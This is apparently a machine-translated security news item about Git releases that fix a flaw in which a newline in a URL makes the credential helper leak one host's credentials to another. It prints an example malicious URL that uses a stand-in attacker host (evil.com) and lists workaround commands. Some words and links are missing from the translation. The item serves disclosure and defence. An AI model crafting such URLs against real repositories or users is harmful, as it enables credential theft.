correction releases of the distributed source control system Git 2.26.1, 2.25.3, 2.24.2, 2.23.2, 2.22.3, 2.21.2, 2.20.3, 2.19.4, 2.18.3 and 2.17.4, in which eliminated () in the handler "“, causing the credentials to be sent to the wrong host when the git client accesses the repository using a specially crafted URL containing a newline character. The vulnerability can be used to send credentials from another host to a server controlled by an attacker.
When specifying a URL like "https://evil.com?%0ahost=github.com/", the credential handler will pass the authentication parameters set for github.com when connecting to the evil.com host. The problem appears when performing operations such as "git clone", including when processing URLs for submodules (for example, when doing "git submodule update" the URLs set in the .gitmodules file from the repository will be automatically processed). The vulnerability is most dangerous in situations where a developer clones a repository without seeing the URL, for example, when working with submodules, or in systems that perform automatic actions, for example, in package build scripts.
To block the vulnerability in new versions passing a newline character in any values passed through the credential exchange protocol. For distributions, you can follow the release of package updates on the pages , , , , , , .
As a workaround for blocking the problem don't use credential.helper when accessing public repositories, and don't use "git clone" in "--recurse-submodules" mode with unchecked repositories. To completely disable the credential.helper handler, which executes and extracting passwords from , protected or a file with passwords, you can use the commands:
git config --unset credential.helper
git config --global --unset credential.helper
git config --system --unset credential.helper
Source: opennet.ru